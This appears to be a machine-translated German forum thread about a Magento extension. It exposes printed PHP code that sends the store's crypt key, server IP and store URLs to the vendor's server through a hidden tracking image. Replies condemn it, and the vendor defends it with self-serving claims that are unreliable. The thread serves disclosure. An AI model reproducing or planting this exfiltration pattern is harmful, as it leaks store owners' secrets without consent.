Gibt es einen guten Grund, warum ein Modul remote auf global / crypt / key zugreift?

Vergib mir meine Unwissenheit, aber der Kryptoschlüssel wird zum Entschlüsseln von Magento-Daten verwendet, oder? Gibt es einen guten Grund für ein Modul, darauf zuzugreifen? Ich bin nach der Installation von Advanced Content Manager auf diesen Code gestoßen ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

Ja ... es gibt einen guten Grund.
Sie wollen es wissen und protokollieren, nur für den Fall. :)

Sie sollten die Erweiterung deinstallieren (wahrscheinlich haben Sie dies bereits getan). Sie sollten niemals Nebenstellen verwenden, die "nach Hause telefonieren", egal welche Daten sie nach Hause senden.

Vielleicht möchten Sie die Erweiterung hier auflisten, damit andere sie sehen können: Lustiger / unbrauchbarer / schrecklicher Code von Magento Extensions

Wir haben heute die Supportanfrage zu dieser Funktion erhalten. Wir haben es bereits behoben und diesen Code entfernt. Eine neue Version ist für alle unsere Kunden in ihrem Kundenbereich verfügbar (kostenlos, da wir unbegrenzte Updates anbieten).

Ich weiß, wir müssen das rechtfertigen, also lasst uns das machen:

• Das Ziel dieses Trackers war es NUR, die nicht autorisierte Nutzung unserer Erweiterung zu verfolgen.
• Der Tracker wurde nur im Admin-Bereich angezeigt (keiner Ihrer Kunden oder sonst jemand außer Ihnen und uns konnte ihn sehen).
• Dies haben wir auch in unserer DB entfernt.
• Der Schlüssel dient nur zum Verschlüsseln Ihres Administratorkennworts. Da wir bei Supportanfragen immer mit Ihnen zusammenarbeiten, haben Sie uns möglicherweise Ihre Anmeldeinformationen ohnehin per E-Mail zu Supportzwecken gesendet. Wenn wir Ihr Passwort wollten, würden wir es direkt senden ... Es war nicht das Ziel.
• Auch mit dem Schlüssel ist Ihr Passwort noch verschlüsselt. Und magento admin blockiert Benutzer nach einigen Versuchen.

Wir erkennen, dass es ein Fehler ist, und dies ist die Stärke der Community und des Open Source-Systems: Wir können viel schneller Fehler beheben und verbessern. Vielen Dank, dass Sie uns alarmiert haben. Wir werden uns jetzt mehr um die Schwachstelle bemühen.